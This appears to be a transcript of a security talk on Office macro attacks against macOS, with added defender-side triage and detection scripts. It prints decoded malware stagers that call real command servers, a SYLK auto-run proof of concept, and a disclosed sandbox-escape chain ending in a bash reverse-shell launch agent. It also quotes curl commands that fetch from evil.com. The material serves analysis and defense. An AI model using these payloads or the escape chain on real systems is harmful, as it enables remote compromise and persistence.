Recent History
macro based attacks, targeting macOS


MACROS
...defined (tl;dr: add code to documents)

Macro:
"A macro is a series of commands & instructions that you group together as a single command to accomplish a task automatically"
-Microsoft

macro code (VBScript) in an MS Office document:

    Sub AutoOpen()
        MsgBox "Hello World!", 0, "Title"
    End Sub

(dialog box: "Title" / "Hello World!")


MACROS
...of course (ab)used by attackers

(Word prompt: "This document contains macros. Do you want to disable macros before opening the file? Macros may contain viruses that could be harmful to your computer. If this file is from a trusted source, click Enable Macros. If you do not fully trust the source, click Disable Macros." [Enable Macros] [Do Not Open] [Disable Macros])

(Activity Monitor: Microsoft Word, Sandbox: Yes)

"The Melissa Virus: An $80 Million Cyber Crime in 1999 Foreshadowed Modern Threats" -FBI
fbi.gov/news/stories/melissa-virus-20th-anniversary-032519

Two decades ago, computer viruses—and public awareness of the tricks used to unleash them—were still relatively new notions to many Americans.

One attack would change that in a significant way.

In late March 1999, a programmer named David Lee Smith hijacked an America Online (AOL) account and used it to post a file on an Internet newsgroup named "alt.sex." The posting promised dozens of free passwords to fee-based websites with adult content. When users took the bait, downloading the document and then opening it with

On March 26, it began spreading like wildfire across the Internet.


MACROS
...now on macOS?

"Apple's share of global computer market grows" -Cult of Mac
Mac adoption at SAP doubles as Apple enterprise reach
malicious & potentially unwanted files for macOS (Kaspersky)
more macs... more mac malware...


2017
macro attack

"U.S. Allies and Rivals Digest Trump's Victory - Carnegie Endowment for International Peace.docm"

Snorre Fagerland (@fstenv):
#OSX #Macro #EmPyre "U.S. Allies and Rivals Digest Trump's Victory - Carnegie Endowment for International Peace" virustotal.com/en/file/07adb8...
12:34 AM · Feb 6, 2017 · TweetDeck

(Word prompt: "Opening U.S. Allies and Rivals Digest Trump's Victory - Carnegie Endow... This document contains macros. Do you want to disable macros before opening the file? Macros may contain viruses that could be harmful to your computer. If this file is from a trusted source, click Enable Macros. If you do not fully trust the source, click Disable Macros." [Learn about macros] [Enable Macros] [Do Not Open] [Disable Macros])

VirusTotal:
SHA256: 07adb8253ccc6fee20940de04c1bf4a54a4455525b2ac33f9c95713a8a102f3d
File name: U.S. Allies and Rivals Digest Trump's Victory - Carnegie Endowmen...
Detection ratio: 4/55
Analysis date: 2017-01-16 18:48:58 UTC (3 weeks ago)

discovery & (limited) detection

"New Attack, Old Tricks"
objective-see.com/blog/blog_0x17.html
2018
macro attack

"BitcoinMagazine-Quidax InterviewQuestions 2018.docm"

Tweet: This #bitcoin interview lure macro doc does not infect any version of Office for Windows. Why? It is targeting MacOffice. When you see libc.dylib, system, and plist, you know the macro is up to no good. objective-see.com/blog/blog_0x35.... (@patrickwardle) virustotal.com/#/file/4454e76... sandbox escape!

VirusTotal: 5 engines detected this file
SHA-256: 4454e768b295ed2869f657b2e9f47421b6ca0548e67092735665cd339a41dddb
File name: BitcoinMagazine-Quidax InterviewQuestions 2018.docm (DOCX)
File size: 22.39 KB
Last analysis: 2018-12-04 03:50:09 UTC
Detection: 5/59
  ClamAV: Legacy.Trojan.Agent-37025
  Endgame: malicious (high confidence)
  Qihoo-360: virus.office.qexvmc.1085
  SentinelOne: static engine - malicious
  TACHYON: Suspicious/WOX.Obfus.Gen.2
  Ad-Aware: Clean

discovery & (limited) detection
download & exec 2nd-stage (python) payload

"Word to Your Mac"
objective-see.com/blog/blog_0x3A.html


2019
macro attack

"[non-Latin file name].doc"

is mac? -> infected document (credit: Kaspersky)
download & exec 2nd-stage (Mach-O) payload

"Cryptocurrency businesses still being targeted by Lazarus"
securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus


e 


Analysis
understanding macro based attacks

EXTRACTING EMBEDDED MACROS

    $ sudo pip install -U oletools
    $ olevba -c <path/to/document>

decalage2/oletools: "oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging." http://www.decalage.info/python/oletools
github.com/decalage2/oletools (installation/usage)

    $ olevba -c ~/Documents/HelloWorld.docm
    olevba 0.55.1 on Python 3.7.3 - http://decalage.info/python/oletools
    FILE: /Users/patrick/Documents/HelloWorld.docm
    Type: OpenXML
    VBA MACRO ThisDocument.cls
    in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
    Sub AutoOpen()
        MsgBox "Hello World!", 0, "Title"
    End Sub

macro extraction

AutoOpen() (automatically) runs after "you open a new document"
"Description of behaviors of AutoExec & AutoOpen macros"
support.microsoft.com/en-us/help/286310/description-of-behaviors-of-autoexec-and-autoopen-macros-in-word


su 


ANALYSIS:
via AutoOpen

    $ olevba -c "U.S. Allies and Rivals Digest Trump's Victory.docm"
    VBA MACRO ThisDocument.cls
    in file: word/vbaProject.bin

'Fisher' subroutine: automatically executed (via AutoOpen)

    Public Sub Fisher()
        Dim result As Long
        Dim cmd As String
        cmd = "ZFhGcHJ2c2dNQINJeVBmPSdhdGZNelpPcVZMYmNqJwppbXBvcnQgc3"
        cmd = cmd + "NsOwppZiBoYXNhdHRyKHNzbCwgJ19jcmVhdGVfdW52ZXJpZm"
        ...
        result = system("echo ""import sys,base64;exec(base64.b64decode('" & cmd & "'))"" | python &")
    End Sub

Sub 'Fisher()':
(1) concat base64-encoded str.
(2) decode & exec via python

Fisher(): embedded macros


ANALYSIS:
decoded python code ...looks familiar!?

    $ python
    >>> import base64
    >>> cmd = "ZEhGcHJ2cZdNQ1NJeVBmPSdhdGZNelpPcVZMYmNqJwppbXBv...."
    >>> base64.b64decode(cmd)

    dXFprvsgMBSIyPf = 'atfMzZOqVLbcj'
    import ssl;
    import sys, urllib2;
    import re, subprocess;
    cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
    ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
    out = ps.stdout.read()
    ps.stdout.close()
    if re.search("Little Snitch", out):
        sys.exit()
    ... 'https://www.securitychecking.org:443/index.asp').read();
    ... 'fff96aed07cb7ea65e7f031bd714607d';
    S,j,out = range(256),0,[]
    for i in range(256):
        j = (j + S[i] + ord(key[i % len(key)])) % 256
        S[i],S[j] = S[j],S[i]
    ...
    exec(''.join(out))

(1) firewall check: Little Snitch running?
(2) download 2nd-stage payload (www.securitychecking.org)
(3) RC4 decrypt this payload (key: fff96aed07cb7ea...)
(4) execute decrypted payload

EmPyre (python backdoor) launcher source:

    launcherBase += "import re, subprocess;"
    launcherBase += "cmd = \"ps -ef | grep Little\\ Snitch | grep -v grep\"\n"
    launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n"
    launcherBase += "out = ps.stdout.read()\n"
    launcherBase += "ps.stdout.close()\n"
    launcherBase += "if re.search(\"Little Snitch\", out):\n"
    launcherBase += "   sys.exit()\n"
    launcherBase += "S,j,out=range(256),0,[]\n"
    launcherBase += "for i in range(256):\n"
    launcherBase += "    j=(j+S[i]+ord(key[i%len(key)]))%256\n"
    launcherBase += "    S[i],S[j]=S[j],S[i]\n"
    launcherBase += "i=j=0\n"
    launcherBase += "for char in a:\n"
    launcherBase += "    i=(i+1)%256\n"
    launcherBase += "    j=(j+S[i])%256\n"
    launcherBase += "    S[i],S[j]=S[j],S[i]\n"
    launcherBase += "    out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
    launcherBase += "exec(''.join(out))"
    ...
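An analyst-side helper, added here and not code from the talk or from EmPyre: it reproduces the two parts of the stager that matter for triage, a plain RC4 implementation matching the loops above (so a captured C2 response can be decrypted offline with the recovered key) and a regex pass that pulls the URL, the RC4 key and the firewall-check string out of a base64 launcher. The launcher text, URL and key below are constructed stand-ins, not the sample's real values.

```python
import base64
import re
from typing import Dict

def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 written to mirror the loops in the decoded launcher (KSA, then PRGA XOR).
    RC4 is symmetric, so one function both encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # keystream generation + XOR
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def recover_second_stage(key_text: str, captured: bytes) -> bytes:
    """Decrypt a captured C2 response the way the stager does: the launcher feeds the key
    string's characters to ord(), so the key bytes are the ASCII of the hex text, not decoded hex."""
    return rc4(key_text.encode("ascii"), captured)

URL_RE = re.compile(r"https?://[^\s'\"()]+")
KEY_RE = re.compile(r"=\s*'([0-9a-fA-F]{32})'")      # 32 hex chars, as in the sample's key line
CHECK_RE = re.compile(r're\.search\("([^"]+)"')      # process names the stager looks for

def triage_launcher(b64_launcher: str) -> Dict[str, object]:
    """Base64-decode the string the VBA pipes into python and pull out the static indicators."""
    text = base64.b64decode(b64_launcher).decode("utf-8", errors="replace")
    return {
        "urls": URL_RE.findall(text),
        "rc4_keys": KEY_RE.findall(text),
        "process_checks": CHECK_RE.findall(text),
        "uses_exec": "exec(" in text,
    }

# Constructed launcher modelled on the decoded sample; the URL and key are placeholders, not the real ones.
CONSTRUCTED_LAUNCHER = (
    "import ssl;import sys, urllib2;import re, subprocess;\n"
    'cmd = "ps -ef | grep Little\\ Snitch | grep -v grep"\n'
    "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n"
    "out = ps.stdout.read()\n"
    'if re.search("Little Snitch", out):\n    sys.exit()\n'
    "a = urllib2.urlopen('https://c2.example.invalid:443/index.asp').read();\n"
    "key = '00112233445566778899aabbccddeeff';\n"
    "exec(''.join(out))\n"
)
CONSTRUCTED_B64 = base64.b64encode(CONSTRUCTED_LAUNCHER.encode()).decode()

if __name__ == "__main__":
    print(triage_launcher(CONSTRUCTED_B64))
    stage2 = b"print('constructed second stage')"   # constructed payload for the decrypt round trip
    print(recover_second_stage("00112233445566778899aabbccddeeff",
                               rc4(b"00112233445566778899aabbccddeeff", stage2)))
```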


ANALYSIS:

    $ olevba -c "BitcoinMagazine-Quidax InterviewQuestions 2018.docm"

'Document_Open()': triggers automatic execution

    Private Sub Document_Open()
        payload = "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aWlwb3J0IHNvY2tldCxzdHJ" & _
            "...6c30pCg==')));"
        path = Environ("HOME") & "/../../../../Library/LaunchAgents/~$com.xpnsec.plist"
        arg = "<?xml version=""1.0"" encoding=""UTF-8""?>\n" & _
            "<!DOCTYPE plist PUBLIC ""-//Apple//DTD PLIST 1.0//EN"" ...>\n" & _
            "<plist version=""1.0"">\n" & _
            "<dict>\n" & _
            "<key>Label</key>\n" & _
            "<string>com.xpnsec.sandbox</string>\n" & _
            "<key>ProgramArguments</key>\n" & _
            "<array>\n" & _
            "<string>python</string>\n" & _
            "<string>-c</string>\n" & _
            "<string>" & payload & "</string>" & _
            "</array>\n" & _
            "<key>RunAtLoad</key>\n" & _
            "<true/>\n" & _
            "</dict>\n" & _
            "</plist>"
        Result = system("echo """ & arg & """ > '" & path & "'", "r")
        'Result = system("launchctl bootout gui/$UID", "r")
    End Sub

(1) decode & exec via python
(2) create ~$com.xpnsec.plist


ANALYSIS:
decoded python payload

    import socket, struct, time
    for x in range(10):
        try:
            s = socket.socket(2, socket.SOCK_STREAM)
            s.connect(('109.202.107.20', 9622))
            break
        except:
            time.sleep(5)
    l = struct.unpack('>I', s.recv(4))[0]
    d = s.recv(l)
    while len(d) < l:
        d += s.recv(l - len(d))
    exec(d, {'s': s})

109.202.107.20 -> download & exec ...Meterpreter


ANALYSIS:
Adam's PoC (Adam Chester)

    path = Environ("HOME") & "/../../../../Library/LaunchAgents/~$com.xpnsec.plist"
    arg = "<?xml version=""1.0"" encoding=""UTF-8""?>\n" & _
        "<!DOCTYPE plist PUBLIC ""-//Apple//DTD PLIST 1.0//EN"" ""http://www.apple.com/DTDs/PropertyList-1.0.dtd"">\n" & _
        ...
        "</plist>"
    Result = system("echo """ & arg & """ > '" & path & "'", "r")

    $ codesign --display -v --entitlements - "Microsoft Word.app"
    com.apple.security.temporary-exception.sbpl
    (allow file-read* file-write*
      (require-any
        (require-all (vnode-type REGULAR-FILE) (regex #"(^|/)~\$[^/]+$"))
      ...

Word's Sandbox Profile: allows us to create a file anywhere on the filesystem as long as it ends with ~$something (Adam Chester)

sandbox escape via /Library/LaunchAgents/~$com.xpnsec.plist

"Escaping the Microsoft Office Sandbox"
objective-see.com/blog/blog_0x35.html


ANALYSIS:
"[non-Latin file name].doc"

'AutoOpen()': triggers automatic execution

embedded (macOS-specific) macros / logic:
(1) download payload (via curl) from nzssdm.com: mt.dat (implant)
(2) set executable (via chmod +x)
(3) execute (via popen)

"Lazarus APT Targets Mac Users with Poisoned Word Document"
labs.sentinelone.com/lazarus-apt-targets-mac-users-poisoned-word-document/


Advanced Exploitation
a '0-click' macro based attack

CURRENT ATTACKS
...rather lame (and dysfunctional?)

macro prompt: (Word prompt: "This document contains macros. Do you want to disable macros before opening the file? Macros may contain viruses that could be harmful to your computer. If this file is from a trusted source, click Enable Macros. If you do not fully trust the source, click Disable Macros." [Enable Macros] [Do Not Open] [Disable Macros])

sandbox: (Activity Monitor: Microsoft Word, Sandbox: Yes)

quarantine attribute + notarization: ("... can't be opened because Apple cannot check it for malicious software. This software needs to be updated. Contact the developer for more information." bitbucket.org [Show in Finder])


AUTOMATIC MACRO EXECUTION
...with no alerts (only Office 2011; Microsoft: #wontfix)

"In Office 2011 for Mac, XLM Macro's in Sylk files are auto executed (no protected mode or macro prompt)"
-"The MS Office Magic Show" (2018), Pieter Ceelen & Stan Hegt

no prompt!

(Excel macro security settings: "Disable all macros with notification" / "Enable all macros (not recommended; potentially dangerous code can run)")
Microsoft Excel for Mac, Version 16.30 (19101301), Excel 2019 ...latest version of Office!

"The Microsoft Office (2016, 2019) for Mac option 'Disable all macros without notification' enables XLM macros without prompting..."
-CERT, vulnerability note VU#125336 (11/2019)


XLM MACROS IN SYLK FILES
...olllld file format!

Sylk (.slk) files: SYmbolic LinK (1980s file format); macro language predating VBA; still supported on mac

PoC.slk: spawn calc (via XLM)

    ID;P
    O;E
    NN;NAuto_open;ER101C1;KOut Flank;F
    C;X1;Y101;K0;ECALL("libc.dylib","system","JC","open -a Calculator")
    C;X1;Y102;K0;EHALT()
    E

"Abusing the SYLK file format"
outflank.nl/blog/2019/10/30/abusing-the-sylk-file-format/
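A defender-side triage check, added here and not part of the talk or of Outflank's post: it parses a SYLK file record by record and flags the two features the PoC above depends on, an auto-executing named range (the NN record's Auto_open) and cell formulas that leave the workbook via CALL/REGISTER/EXEC. The function names are mine; the sample input is the PoC from the slide.

```python
import re
from typing import Dict, List

# XLM auto-executing names carried in a SYLK NN (named range) record; Auto_open is what the PoC uses.
AUTO_NAMES = {"auto_open", "auto_close", "auto_activate", "auto_deactivate"}
# XLM functions that leave the workbook: CALL/REGISTER reach into dylibs (libc.dylib:system), EXEC launches.
RISKY_FUNCS = re.compile(r"\b(CALL|REGISTER|EXEC)\s*\(", re.IGNORECASE)

def split_fields(line: str) -> List[str]:
    """Split one SYLK record on ';' outside double quotes; ';;' is the escape for a literal ';'."""
    fields, cur, in_quotes, i = [], "", False, 0
    while i < len(line):
        ch = line[i]
        if ch == '"':
            in_quotes = not in_quotes
        if ch == ";" and not in_quotes:
            if line[i + 1:i + 2] == ";":
                cur += ";"
                i += 2
                continue
            fields.append(cur)
            cur = ""
        else:
            cur += ch
        i += 1
    fields.append(cur)
    return fields

def parse_sylk(text: str) -> List[Dict[str, str]]:
    """Each record is 'RTD;Tvalue;Tvalue...': a record type, then fields keyed by a one-letter tag."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rtd, *fields = split_fields(line.strip())
        rec = {"type": rtd}
        for f in fields:
            if f:
                rec[f[0]] = f[1:]
        records.append(rec)
    return records

def assess_sylk(text: str) -> Dict[str, object]:
    """Flag auto-exec names (NN records) and risky formulas (E field of C records)."""
    auto_names, risky = [], []
    for rec in parse_sylk(text):
        if rec["type"] == "NN" and rec.get("N", "").lower() in AUTO_NAMES:
            auto_names.append(rec["N"])
        if rec["type"] == "C" and RISKY_FUNCS.search(rec.get("E", "")):
            risky.append(rec["E"])
    return {"auto_exec_names": auto_names, "risky_formulas": risky,
            "verdict": bool(auto_names and risky)}

# The PoC from the slide (it only spawns Calculator), used here as the sample input.
POC_SLK = """ID;P
O;E
NN;NAuto_open;ER101C1;KOut Flank;F
C;X1;Y101;K0;ECALL("libc.dylib","system","JC","open -a Calculator")
C;X1;Y102;K0;EHALT()
E
"""

if __name__ == "__main__":
    print(assess_sylk(POC_SLK))
```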




SANDBOX BYPASS
...spawning calc, is now, far from end-game

(Activity Monitor: Microsoft Word, Sandbox: Yes -> Calculator, user, Sandbox: Yes)

"In a sandboxed application, child processes created with the Process class inherit the sandbox of the parent app" -Apple

    $ codesign --display -v --entitlements - "Microsoft Word.app"
    com.apple.security.temporary-exception.sbpl
    (allow file-read* file-write*
      (require-any
        (require-all (vnode-type REGULAR-FILE) (regex #"(^|/)~\$[^/]+$"))
      )
    )

Word's (Office) Sandbox Profile: allows us to create a file anywhere on the filesystem as long as it ends with ~$something (Adam Chester)

...now patched:

    <string>
    (deny file-write*
      (subpath (string-append (param "_HOME") "/Library/Application Scripts"))
      (subpath (string-append (param "_HOME") "/Library/LaunchAgents")))
    </string>


SANDBOX BYPASS
...escape?

sandbox allows: network comms, script execution

    # processMonitor
    {
      "event" : "ES_EVENT_TYPE_NOTIFY_EXEC",
      "process" : {
        "path" : "/usr/bin/curl",
        "arguments" : [
          "curl",
          "http://evil.com/escape.py",
          "-o",
          "/tmp/~$escape.py"
        ],
    ...
    {
      "event" : "ES_EVENT_TYPE_NOTIFY_EXEC",
      "process" : {
        "path" : "/System/Library/.../2.7/bin/python2.7",
        "arguments" : [
          "python",
          "/tmp/~$escape.py"
        ],
    ...

curl / python...allowed! (still sandboxed)


SANDBOX BYPASS
...via login items

~$escape.py:

    #create (CF)URL to app (e.g. Terminal.app)
    appURL = CoreFoundation.CFURLCreateWithFileSystemPath(
        kCFAllocatorDefault, path2App.get_ref(), kCFURLPOSIXPathStyle, 1)

    #get the list of (existing) login items
    loginItems = CoreServices.LSSharedFileListCreate(
        kCFAllocatorDefault, kLSSharedFileListSessionLoginItems, None)

    #add app to list of login items
    CoreServices.LSSharedFileListInsertItemURL(
        loginItems, kLSSharedFileListItemLast, None, None, appURL, None, None)

# TrueTree
/System/Library/CoreServices/loginwindow.app
/System/Applications/Utilities/Terminal.app
/System/Library/LaunchDaemons/com.apple.loginwindow.plist

(System Preferences > Users & Groups > Login Items: "To hide an application when you log in, select the checkbox in the Hide column next to the application." "Click the lock to make changes.")
(Activity Monitor: Terminal, Sandbox: (none)) -> un-sandboxed!

loginwindow -> login items (TrueTree, J. Bradley)


QUARANTINED / NOTARIZATION
...can't pass args to login items; persist our own (payload)?

(Login Items: "These items will open automatically when you log in:" Terminal, Application) -> (Login Items: ~$payload, Unix executable)

    NN;NAuto_open;ER101C1;KOut Flank;F
    C;X1;Y102;K0;ECALL("libc.dylib","system","JC","touch /tmp/\~\$payload")

    $ xattr ~\$payload
    com.apple.quarantine

    $ xattr -p com.apple.quarantine /tmp/~\$payload
    0086;5e4c4b7a;Microsoft Excel;

("~$payload" cannot be opened because it is from an unidentified developer. / macOS cannot verify that this app is free from malware.)

any created payload: com.apple.quarantine (can't $ xattr -rc in sandbox)
blocked :(
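A forensic helper added here (mine, not from the talk): it parses the four-field com.apple.quarantine value printed above (flags;timestamp;agent;uuid) and flags files whose quarantining agent is an Office application but which are not Office documents, which is exactly what the slide shows: Excel writing a Unix executable. The Office document-extension allowlist and the second sample value are constructed assumptions.

```python
import os
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Optional

OFFICE_AGENTS = {"Microsoft Word", "Microsoft Excel", "Microsoft PowerPoint"}
# Assumed allowlist: files Office legitimately writes (documents and its ~$ owner/lock files).
OFFICE_DOC_EXTS = {".docx", ".docm", ".doc", ".xlsx", ".xlsm", ".xls", ".pptx", ".pptm", ".ppt", ".tmp"}

@dataclass
class Quarantine:
    flags: int                  # hex bit field; Apple does not document the bits, so it is kept raw
    timestamp: datetime         # hex seconds since the epoch, when the file was quarantined
    agent: str                  # LSQuarantineAgentName: the app that wrote the file
    uuid: Optional[str]         # QuarantineEvents row id; absent in the slide's value

def parse_quarantine(value: str) -> Quarantine:
    """Parse 'flags;timestamp;agent;uuid' as printed by `xattr -p com.apple.quarantine`."""
    parts = value.strip().split(";")
    if len(parts) < 3:
        raise ValueError(f"not a quarantine attribute: {value!r}")
    flags = int(parts[0], 16)
    ts = datetime.fromtimestamp(int(parts[1], 16), tz=timezone.utc)
    uuid = parts[3] if len(parts) > 3 and parts[3] else None
    return Quarantine(flags, ts, parts[2], uuid)

def suspicious_office_drop(path: str, value: str) -> bool:
    """True when an Office app quarantined this file and it is not an Office document:
    an executable, script, plist or archive written by Word/Excel is the pattern in the slides."""
    q = parse_quarantine(value)
    if q.agent not in OFFICE_AGENTS:
        return False
    _, ext = os.path.splitext(path)
    return ext.lower() not in OFFICE_DOC_EXTS

if __name__ == "__main__":
    # The value from the slide, plus a constructed Safari download for contrast.
    for path, value in [("/tmp/~$payload", "0086;5e4c4b7a;Microsoft Excel;"),
                        ("/Users/u/Downloads/tool", "0083;5e4c4b7a;Safari;CONSTRUCTED-UUID")]:
        q = parse_quarantine(value)
        print(path, q.agent, q.timestamp.isoformat(), suspicious_office_drop(path, value))
```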


QUARANTINED / NOTARIZATION
...an idea

a launch agent: run apple binary, pass arguments!

    <?xml version="1.0" encoding="UTF-8"?>
    <plist version="1.0">
    <dict>
      <key>ProgramArguments</key>
      <array>
        <string>/bin/bash</string>
        <string>-c</string>
        <string>/bin/bash -i &gt;&amp; /dev/tcp/<attacker ip>/8080 0&gt;&amp;1</string>
      </array>
    ...

launch agent (reverse shell, via bash): avoids com.apple.quarantine
sandbox rule: creating launch agents: disallowed!

QUARANTINED / NOTARIZATION
...an idea

sandbox escape: ...apple only, with no args
quarantine 'bypass' (create launch agent): ...but can't create (from sandbox)

...must find a way for an apple binary (with no arguments), to create a launch agent for us!


ARCHIVE UTILITY.APP
...an idea!

Q: what happens if we 'persist' a .zip file?
A: macOS invokes its default handler, Archive Utility.app (an apple binary, outside the sandbox)!

~/Library/~$payload.zip -> Archive Utility -> LaunchAgents/foo.plist -> launch agent "created"

FULL EXPLOIT CHAIN
...remotely infecting macOS

(1) user opens .slk file
(2) downloads & "persists" ~$payload.zip (as a login item)
(3) on (next) login, "Archive Utility" invoked & unzips ...creating launch agent in LaunchAgents/
(4) on (next) login, launch agent runs ...reverse shell!

FULL EXPLOIT CHAIN
an 'unsandboxed' reverse shell ...game over!

    <dict>
      <key>ProgramArguments</key>
      <array>
        <string>/bin/bash</string>
        <string>-c</string>
        <string>/bin/bash -i &gt;&amp; /dev/tcp/<attacker ip>/8080 0&gt;&amp;1</string>
      </array>
    ...

launch agent (reverse shell, via bash): runs outside sandbox; can download & unquarantine files!


Patrick Wardle 2:05 PM
    $ sw_vers
    ProductName: Mac OS X
    ProductVersion: 10.15.1
    BuildVersion: 19B88
works on fully patched macOS 10.15.1 too

Jaron Bradley 2:06 PM
I like how it still says OS X

final payload: (repurposed) OSX.WindTail
    user@users-Mac ~ % ps aux | grep -i Final
    user 1759 0.0 0.6 4848980 12476 ?? S 4:11PM 0:00.09 /Users/user/Library/Final Presentation.app/Contents/MacOS/usrnode
    user 1755 0.0 0.5 4842364 10684 ?? S 4:11PM 0:00.06 /private/tmp/Final Presentation.app/Contents/MacOS/usrnode

ahhhhh so dope

I'm going to see if I can install some repurposed malware (unsigned & unnotarized)


Defense
protection against macro based attacks

FIXES & BUG REPORTS
...Microsoft & Apple

Security Update Guide > Details
CVE-2019-1457 (Microsoft Office Excel Security Feature Bypass) Security Vulnerability
macro bug patched: CVE-2019-1457

MSRC Case 54864 CRM:0461129770
Microsoft Office (macOS) Sandbox Escape + Bypassing Catalina's File Quarantine and Code Notarizations
Patrick Wardle, Fri 11/8/2019 9:22 AM
To: product-security@apple.com
2 attachments (494 KB): writeup MICROSOFT.pdf (255KB), writeup APPLE.pdf (239KB)

Aloha,
Reporting a full exploit chain I've created that remotely installs a persistent unsigned macOS backdoor on Catalina (10.15.1)

full report to Apple -> patched: 10.15.3

Microsoft Security Response Center <secure@microsoft.com>, Tue 11/19/2019 1:16 PM
Microsoft Office (macOS) Sandbox Escape
To: Patrick Wardle; secure@microsoft.com; Josh Stein
attachment: writeup MICROSOFT.pdf (255KB)

Aloha,
I've uncovered a sandbox escape affecting the latest versions of Microsoft Office on macOS.

Hi Security Researcher,
Thank you for your submission. We determined your finding is valid but is a known issue on the Apple side.

known issue ...on the Apple side!?


DETECTION

    # ./processMonitor
    {
      "event" : "ES_EVENT_TYPE_NOTIFY_EXEC",
      "process" : {
        "path" : "/Applications/Microsoft Excel.app/...",
        "pid" : 1406,
    ...
    {
      "event" : "ES_EVENT_TYPE_NOTIFY_EXEC",
      "process" : {
        "path" : "/usr/bin/curl",
        "arguments" : [
          "curl",
          "http://evil.com/escape.py",
          "-o",
          "/tmp/~$escape.py"
        ],
        "ppid" : 1406
    ...
    {
      "event" : "ES_EVENT_TYPE_NOTIFY_EXEC",
      "process" : {
        "path" : "/System/Library/.../2.7/bin/python2.7",
        "arguments" : [
          "python",
          "/tmp/~$escape.py"
        ],
        "ppid" : 1406
    ...

suspicious children! Excel (pid: 1406) spawning curl & python!?

DETECTION

    # ./fileMonitor
    {
      "event" : "ES_EVENT_TYPE_NOTIFY_WRITE",
      "file" : {
        "destination" : "~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm",
        "path" : "/System/Library/CoreServices/backgroundtaskmanagementagent",
      }
    }

login item persistence (backgrounditems.btm)

(Login Items: "These items will open automatically when you log in:" ~$payload.zip, ZIP archive) -> non-app login item! suspicious persistence!

"Block Blocking Login Items"
objective-see.com/blog/blog_0x31.html
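Detection logic added here (mine, not the processMonitor tool shown in the talk): it replays a stream of EXEC events shaped like the output above, keeps a pid-to-path map, and raises an alert for any child of an Office process that is a downloader, interpreter or shell, or whose arguments touch a `~$`-prefixed path (the only file pattern the Office sandbox lets Word/Excel write). The events below are constructed to mirror the slide's Excel -> curl -> python chain.

```python
import os
import re
from typing import Dict, Iterable, List

OFFICE_BUNDLES = ("/Applications/Microsoft Word.app/", "/Applications/Microsoft Excel.app/",
                  "/Applications/Microsoft PowerPoint.app/")
# Binaries an opened document has no business launching (downloaders, interpreters, shells).
LIVING_OFF_THE_LAND = {"curl", "wget", "python", "python2.7", "python3", "perl", "osascript",
                       "sh", "bash", "zsh"}
# The Office sandbox profile's writable pattern: a file whose name starts with "~$".
TILDE_DOLLAR = re.compile(r"(^|/)~\$[^/]+$")

def is_office_path(path: str) -> bool:
    return path.startswith(OFFICE_BUNDLES)

def detect(events: Iterable[dict]) -> List[str]:
    """Return one alert string per suspicious EXEC whose parent is an Office app."""
    pid_to_path: Dict[int, str] = {}
    alerts = []
    for ev in events:
        if ev.get("event") != "ES_EVENT_TYPE_NOTIFY_EXEC":
            continue
        proc = ev["process"]
        pid_to_path[proc["pid"]] = proc["path"]          # remember every exec'd image by pid
        parent = pid_to_path.get(proc.get("ppid"), "")   # unknown parent -> "" -> not Office
        if not is_office_path(parent):
            continue
        binary = os.path.basename(proc["path"])
        args = proc.get("arguments", [])
        reasons = []
        if binary in LIVING_OFF_THE_LAND:
            reasons.append(f"spawned {binary}")
        if any(TILDE_DOLLAR.search(a) for a in args):
            reasons.append("uses ~$-prefixed path (sandbox-writable)")
        if reasons:
            alerts.append(f"{os.path.basename(parent)} (pid {proc['ppid']}) -> "
                          f"{' '.join(args) or proc['path']}: {'; '.join(reasons)}")
    return alerts

def ev(path: str, pid: int, ppid: int, args: List[str]) -> dict:
    """Build one event in the processMonitor JSON shape (constructed, not captured)."""
    return {"event": "ES_EVENT_TYPE_NOTIFY_EXEC",
            "process": {"path": path, "pid": pid, "ppid": ppid, "arguments": args}}

# Constructed sample stream: Excel (pid 1406) spawning curl and python, plus an unrelated curl.
CONSTRUCTED_EVENTS = [
    ev("/Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel", 1406, 1, ["Microsoft Excel"]),
    ev("/usr/bin/curl", 1410, 1406, ["curl", "http://evil.com/escape.py", "-o", "/tmp/~$escape.py"]),
    ev("/System/Library/Frameworks/Python.framework/Versions/2.7/bin/python2.7", 1411, 1406,
       ["python", "/tmp/~$escape.py"]),
    ev("/usr/bin/curl", 2001, 500, ["curl", "https://example.invalid/"]),  # not an Office child
]

if __name__ == "__main__":
    for alert in detect(CONSTRUCTED_EVENTS):
        print(alert)
```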


GENERICALLY DETECTING MAC MALWARE
via JamfProtect (MonitorKit + Apple's game engine)

"A Clever Tool Uses Apple's Videogame Logic Engine to Protect Macs" ...in the news

Apple's game (logic) engine -> alert -> actions (alert, log, etc)


Conclusion

TAKE AWAYS

macro attacks ...targeting macOS users
defense in depth!
Ensure your macOS systems are protected by a behavior-based security tool!

Friends of Objective-See:
Jamf, Guardian Mobile Firewall, iVerify, Digital Guardian, Sophos, Halo Privacy, SecureMac, SmugMug

patrick.wardle@jamf.com

Announcing: free (online) books
"THE ART OF MAC MALWARE"
volume 0x1: Analysis
  -> infection vectors
  -> methods of persistence
  -> analysis tools & techniques
author: p. wardle
visit: https://taomm.org

* "Lazarus APT Targets Mac Users With Poisoned Word Document" -Phil Stokes


